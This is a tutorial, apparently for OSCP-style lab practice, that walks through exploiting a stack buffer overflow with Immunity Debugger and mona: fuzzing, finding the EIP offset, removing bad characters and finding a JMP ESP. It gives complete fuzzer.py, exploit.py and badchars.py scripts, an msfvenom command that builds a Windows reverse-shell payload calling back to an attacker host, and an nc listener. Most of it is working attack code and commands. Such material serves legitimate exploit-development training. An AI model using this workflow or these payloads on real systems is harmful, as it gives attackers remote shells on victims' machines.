Buffer overflow using Immunity Debugger
· Right-click the Immunity Debugger icon on the Desktop and choose “Run as administrator”.
· Open the executable file in Immunity Debugger and run it.
· Run !mona config -set workingfolder c:\mona\%p
· Run the fuzzer.py program, to know what is the largest number of bytes were sent before it’s crashed.
· Exploit the BOF by running exploit.py
o Create payload by /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600 and put in exploit.py payload variable.
· Run !mona findmsp -distance 600 to Fund the EIP.
· Update your exploit.py script
o set the offset variable to this value.
o Set the payload variable to an empty string again.
o Set the retn variable to “BBBB”.
o Run exploit.py again.
· To find bad characters
o !mona bytearray -b “\x00” create an array without null bytes.
o Run badchars.py to generate bad characters string.
o Put the string on payload variable in exploit.py then run it.
o Run !mona compare -f C:\mona\oscp\bytearray.bin -a <ESP>.
o Repeate running the comparison until the result returns Unmodified.
· To find jump data
o Run !mona jmp -r esp -cpb “bad_character”
o Put the result in retn variable in exploit.py.
· Generate the payload
o msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b “bad_character” -f c
o Put the string on payload variable in exploit.py.
o Put padding variable as “\x90” * 16 to generate some space in memory.
o Nc -nlvp LPORT
o Run exploit.py.
Fuzzer.py code
#!/usr/bin/env python3
import socket, time, sys
ip = “MACHINE_IP”
port = 1337
timeout = 5
prefix = “OVERFLOW1 “
string = prefix + “A” * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
print(“Fuzzing with {} bytes”.format(len(string) — len(prefix)))
s.send(bytes(string, “latin-1”))
s.recv(1024)
except:
print(“Fuzzing crashed at {} bytes”.format(len(string) — len(prefix)))
sys.exit(0)
string += 100 * “A”
time.sleep(1)
exploit.py code
import socket
ip = “MACHINE_IP”
port = 1337
prefix = “OVERFLOW1 “
offset = 0
overflow = “A” * offset
retn = “”
padding = “”
payload = “”
postfix = “”
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print(“Sending evil buffer…”)
s.send(bytes(buffer + “\r\n”, “latin-1”))
print(“Done!”)
except:
print(“Could not connect.”)
badchars.py code
for x in range(1, 256):
print(“\\x” + “{:02x}”.format(x), end=’’)
print()